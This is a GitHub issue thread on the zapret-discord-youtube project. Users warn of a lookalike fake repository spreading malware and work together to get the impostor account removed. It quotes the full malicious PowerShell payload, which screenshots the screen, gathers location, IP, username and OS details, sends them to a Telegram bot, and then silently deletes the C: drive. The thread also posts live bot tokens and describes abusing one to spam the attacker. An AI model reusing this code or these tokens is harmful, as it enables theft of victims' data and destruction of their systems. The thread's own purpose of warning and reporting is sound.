### ISSUE TITLE
So important

### ISSUE THREAD

**Issue by SizRex** [Flowseal/zapret-discord-youtube#154]
There are fake repository and fake account of this repository creator. Please report him before more people install virus! This virus just deleted my whole system. And this mo****** edited my comment

https://github.com/FlowseaI/zapret-discord-youtube/

**Comment by SizRex** [comment]
Malicious code that was added


```
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'

try {
    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
    $memoryStream = New-Object System.IO.MemoryStream
    $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
    $graphics.Dispose()
    $bitmap.Dispose()
    $memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null

    $country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
    $city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
    $ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
    $isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
    $rights = if ($isAdmin) { "Admin" } else { "User     " }
    $os_caption = (Get-CimInstance Win32_OperatingSystem).Caption
    $os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }

$message = @"
Type: $os_caption ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@

    $bot_token = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
    $chat_id = "@dgfkewr"
    $uri = "https://api.telegram.org/bot$bot_token/sendPhoto"

    $client = [System.Net.Http.HttpClient]::new()
    $client.Timeout = [TimeSpan]::FromMinutes(5)

    $multipartContent = [System.Net.Http.MultipartFormDataContent]::new()
    $fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
    $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
    $multipartContent.Add($fileContent, "photo", "screenshot.png")
    $multipartContent.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
    $multipartContent.Add([System.Net.Http.StringContent]::new($message), "caption")

    $response = $client.PostAsync($uri, $multipartContent).Result

    Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden

}
finally {
    if ($memoryStream) {
        $memoryStream.Dispose()
    }
    if ($client) {
        $client.Dispose()
    }
}
```

**Comment by SizRex** [comment]
Make sure to report it...

Changes:
https://github.com/FlowseaI/zapret-discord-youtube/commit/8be5ce2a4e70c479fc04ba6fad4c358a37955a03#diff-be7c8ae5e583b167314437a1dd7d7ec8fd6577a894645fbc5a9cc3c1d31e50a2L2

**Comment by Flowseal** [comment]
Reported

**Comment by Bubildo** [comment]
I think you should also report the Telegram Bot he uses.
He also showed his token. probably can spam

**Comment by SizRex** [comment]
I have no idea how to report his telegram (bot) but he messages me and I can confirm that 1000+ systems was affected by this fake
<img width="437" alt="image" src="https://github.com/user-attachments/assets/da476840-d815-467d-8844-7a5138d0078f">

**Comment by Bubildo** [comment]
He just started spamming in the comments of all Issues with the "new version" what a pathetic creature

**Comment by Bubildo** [comment]
I personally reported everyone in the group and the group itself.

**Comment by Bubildo** [comment]
Some hero is spamming their group through a leaked token ROFL

**Comment by SizRex** [comment]
> Some hero is spamming their group through a leaked token ROFL

That's some nice community against this guys)

**Comment by Kaisurina** [comment]
> caption

np lil bro 😊

**Comment by Kaisurina** [comment]
> Some hero is spamming their group through a leaked token ROFL

np lil bro 😊

**Comment by lunyslasher** [comment]
He updated his token, his new token:

8190913599:AAEoUGKSPHeEpi1_B97FFz_m5tfpnCqUJac

**Comment by PulseDiver** [comment]
scam - FlowseaI (uppercase "i")
real - https://github.com/Flowseal (lowercase "L")

see last account name symbol!!!

**Comment by Nill-R** [comment]
![изображение](https://github.com/user-attachments/assets/93f89510-344a-4ff3-a281-092303736259)
If you use Iosevka with distinctly different glyphs, it immediately becomes apparent that these are two different users

**Comment by Nill-R** [comment]
![зображення](https://github.com/user-attachments/assets/e916f193-6274-4b50-802d-efa72ffe04a9)
Все, мне пришло письмо на мою жалобу, пользователь удален
Скрин моей проверки показывает 404 теперь по нему

**Comment by Kropanov** [comment]
He's cooked

**Comment by Flaymi** [comment]
Someone is clogged his TG channel xd

**Comment by imPDA** [comment]
![image](https://github.com/user-attachments/assets/aacfbbce-681e-4015-95c2-5bd68c58173e)

He got deleted. Nice job guys!

**Comment by SizRex** [comment]
Great job guys, thank you all for what you did!

**Comment by tossy-arch** [comment]
can someone give link to his tg channel, please?

**Comment by gamerforEA** [comment]
> can someone give link to his tg channel, please?

In the latest script chat_id was "P1iz2bol"

**Comment by tossy-arch** [comment]
> > can someone give link to his tg channel, please?
> 
> In the latest script chat_id was "P1iz2bol"

Thank, but can you tell me what the virus has been stilling? Alas, I do cannot understand the code above

**Comment by gamerforEA** [comment]
> > > can someone give link to his tg channel, please?
> > 
> > 
> > In the latest script chat_id was "P1iz2bol"
> 
> Thank, but can you tell me what the virus has been stilling? Alas, I do cannot understand the code above

Screenshot, country, city, IP, OS name and arch (x64/x86).

**Comment by lunyslasher** [comment]
> Someone is clogged his TG channel xd

its me xd

**Comment by Sifirus** [comment]
Is anyone got "infected"? I just tried to recover from last boot. What should I do to stay safe. I'll be very glad for any help.

**Comment by Sifirus** [comment]
> > > can someone give link to his tg channel, please?
> > 
> > 
> > In the latest script chat_id was "P1iz2bol"
> 
> Thank, but can you tell me what the virus has been stilling? Alas, I do cannot understand the code above

```
> Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden
```
This line erases all directories from C drive through hidden cmd
